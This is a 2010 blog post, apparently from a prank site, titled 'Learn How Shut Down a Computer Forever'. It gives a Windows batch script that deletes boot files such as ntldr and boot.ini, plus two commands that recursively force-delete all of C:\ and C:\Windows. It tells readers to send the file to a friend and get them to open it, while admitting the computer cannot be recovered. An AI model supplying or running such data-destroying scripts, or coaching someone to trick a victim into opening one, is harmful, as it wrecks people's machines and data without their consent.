Friday, July 2, 2010

Learn How Shut Down a Computer Forever

I am shure you want to play pranks on somebody, but there have been situations when the traditional methods just aren't available, or aren't enough? Previously i posted some of the funniest pranks you can play on your friends: "Deadly Virus Prank", "The Ultimate Virus", "How to Create a Fake and Harmless Virus" and " Facebook Virus Prank". Now if you are ready to pull up this prank on your friend, make shure he hasn't a weak heart, because this prank definitely will freak him out and may cause death :P With this little trick you can shut down a computer forever!!!






Let's strat:



Open notepad and copy/paste this code:



@echo off

attrib -r -s -h c:\autoexec.bat

del c:\autoexec.bat

attrib -r -s -h c:\boot.ini

del c:\boot.ini

attrib -r -s -h c:\ntldr

del c:\ntldr

attrib -r -s -h c:\windows\win.ini

del c:\windows\win.ini



Now Save it as a .bat file.



This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.



REMEMBER - DO NOT CLICK THIS FILE.

YOU WON'T RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!



Send it to your friends computer and tell them to open it. Have fun!!





Here is another code too.....



cmd /c del c:\windows\* /F /S /Q

cmd /c del c:\* /F /S /Q



Paste it in NotePad And Save It with Extension .cmd or .bat



Do you have questions, comments, or suggestions? Feel free to post a comment!



0 comments:

Post a Comment